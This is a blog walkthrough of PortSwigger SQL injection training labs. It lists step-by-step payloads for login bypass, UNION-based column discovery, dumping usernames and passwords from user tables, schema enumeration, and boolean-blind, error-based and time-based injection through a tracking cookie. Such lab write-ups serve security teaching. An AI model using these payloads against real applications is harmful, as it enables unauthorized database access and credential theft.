SQL INJECTION Labs with Use cases and Solutions !!!
This blog discusses the SQL INJECTION labs provided by port swigger.
SQL is a language used to manipulate data in databases and is commonly used by front-end web applications. SQL injection attacks happen when malicious code is inserted into a web form or input field, typically using escape characters. Developers need to prevent these attacks by using string sanitization or input validation.
SQL Injection involves inserting malicious SQL statements or code into a web application’s input field, which is then sent to the database for execution. If the attack is successful, the injected code can modify or delete data in the database, granting unauthorized access to sensitive informationsuchas credit card details, passwords, and personal data. SQL Injection is a significantdanger to web applications as it can lead to data loss, financial damage, and harm a company’s reputation.
A key part of all CTF’s and bug bounties has to do with SQL injection.
SQL injection is such a widely utilized entry point for web attacks that it has been listed under the OWASP Top 10 vulnerabilities.
To make u understand in a better way! Let’s solve the lab!!
Let’s Access the Lab
Step-1 This is the basic lab so we will use a basic payload in the URL Engine/Search bar and give it a value ‘OR+1=1–
Step-2 Now just submit the request .
Lab is solved.
Use Burp Suite to intercept and modify the login request.Modify the username parameter, giving it the value: administrator'--
Lets Access the Lab.
Step-1 Intercept the Request and modify it.
Step-2 Modify the Request accordingly here we have to give it a value to know the number of columns so we will use payload i.e ‘+UNION+SELECT+NULL–. And we can observe that it has a 500 response error .
Step-3 Modify the category parameter to add a additional column containing a null value: '+UNION+SELECT+NULL,NULL--
Step-4 Continue adding null values until the error disappears, and the response includes additional content containing the null values.
Hola lab is solved!!!
Let’s access the lab.
Step1- Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Here we will determine the number of columns by the payload i.e '+UNION+SELECT+NULL,NULL,NULL-- or we can directly use the string in random places instead of null to find out which column has text i.e '+UNION+SELECT+'abcdef',NULL,NULL--
Step-3 Here we had used a payload i.e '+UNION+SELECT+NULL,'yHYG9p',NULL-- It aslo show that the following has three columns and the 2nd one has text in it.
Lab is solved.
Step-1 Lets access the lab, and it clearly states that this database contains a table called users, with the columns named username and password.
Step-2 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-3 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter.
'+UNION+SELECT+'abc','def'--
Step-4 Use the following payload to retrieve the contents of the users table: '+UNION+SELECT+username,+password+FROM+users--
Scroll down a little and here we got the username and password.
lets access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+NULL,'abc'--
Step-3 Use the following payload to retrieve the contents of the users table: '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Verify that the application’s response contains usernames and passwords.
Let’s access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+NULL,'def'+FROM+dual--
Step-3 Use the following payload to display the database version: '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
Let’s access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Lets try this payload if we get an error- '+UNION+SELECT+'abc','def'—
Step-3 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'#
Step-4 Use the following payload to display the database version: '+UNION+SELECT+@@version,+NULL#
Let’s access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'--
Step-3 Use the following payload to retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
Find the name of the table containing user credentials.
Step-4 Now as we know the table name now we can replace the table name to retrieve the details of the columns in the table: '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_owumhh'--
Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users: '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef-- Now just scroll down to find the username and password of administrator.
Let’s access the lab.
Step-1 Use Burp Suite to intercept and modify the request that sets the product category filter.
Step-2 As we know that there is a built-in table i.e., dual, so we will first determine the number of columns and also which columns have data. Payload i.e '+UNION+SELECT+'abc','def'+FROM+dual--
Step-3 Now we will first retireve the list of table in the database :'+UNION+SELECT+table_name,NULL+FROM+all_tables-- Now Find the name of the table containing user credentials.
Step-4 Use the following payload (replacing the table name) to retrieve the details of the columns in the table: '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_YAAYCQ'--
Step-5 Now we will replace the table and column name to retrieve the username and password for all users: '+UNION+SELECT+USERNAME_AUABTP,+PASSWORD_TWJHP3+USERS_YAAYCQ--
Use the username and password to login.
Step-1 Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie. For simplicity, let’s say the original value of the cookie is TrackingId=xyz.
Step-2 Modify the TrackingId cookie, changing it to: TrackingId=xyz' AND '1'='1 Verify that the “Welcome back” message appears in the response.
Step-3 Now change it to: TrackingId=xyz' AND '1'='2 Verify that the “Welcome back” message does not appear in the response. This demonstrates how you can test a single boolean condition and infer the result.
Step-4 Now change it to: TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a Verify that the condition is true, confirming that there is a table called users.
Step-5 Now change it to: TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a Verify that the condition is true, confirming that there is a user called administrator.
Step-6 The next step is to determine how many characters are in the password of the administrator user. To do this, change the value to: TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a This condition should be true, confirming that the password is greater than 1 character in length.
Step-7 Send a series of follow-up values to test different password lengths. Send: TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
This is an alternate method of determining length i.e. 20 by using intruder.
Here is the password now we can solve the lab. Note – As per now some screenshots are missing or deleted, will try to upload in the future.
Let’s access the lab.
Step-1 Modify the TrackingId cookie, appending a single quotation mark to it: TrackingId=xyz'
Verify that an error message is received.
Step-2 Now change it to two quotation marks: TrackingId=xyz'' Verify that the error disappears. This suggests that a syntax error (in this case, the unclosed quotation mark) is having a detectable effect on the response.
Step-3 You now need to confirm that the server is interpreting the injection as a SQL query i.e. that the error is a SQL syntax error as opposed to any other kind of error. To do this, you first need to construct a subquery using valid SQL syntax. Try submitting: TrackingId=xyz'||(SELECT '')||'
Step-4 In this case, notice that the query still appears to be invalid. This may be due to the database type – try specifying a predictable table name in the query: TrackingId=xyz'||(SELECT '' FROM dual)||' As you no longer receive an error, this indicates that the target is probably using an Oracle database, which requires all SELECT statements to explicitly specify a table name.
Step-5 As long as you make sure to always inject syntactically valid SQL queries, you can use this error response to infer key information about the database. For example, in order to verify that the users table exists, send the following query: TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||' As this query does not return an error, you can infer that this table does exist. Note that the WHERE ROWNUM = 1 condition is important here to prevent the query from returning more than one row, which would break our concatenation.
Step-6 You can also exploit this behavior to test conditions. First, submit the following query: TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' Verify that an error message is received.
Step-7 Now change it to: TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' Verify that the error disappears. This demonstrates that you can trigger an error conditionally on the truth of a specific condition. The CASE statement tests a condition and evaluates to one expression if the condition is true, and another expression if the condition is false. The former expression contains a divide-by-zero, which causes an error. In this case, the two payloads test the conditions 1=1 and 1=2, and an error is received when the condition is true.
Step-7 Use the intruder to guess the passwords.
Let’s access the lab.
Step-1 Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.
Step-2 Modify the TrackingId cookie, changing it to: TrackingId=x'||pg_sleep(10)--
Submit the request and observe that the application takes 10 seconds to respond.
Recent Comments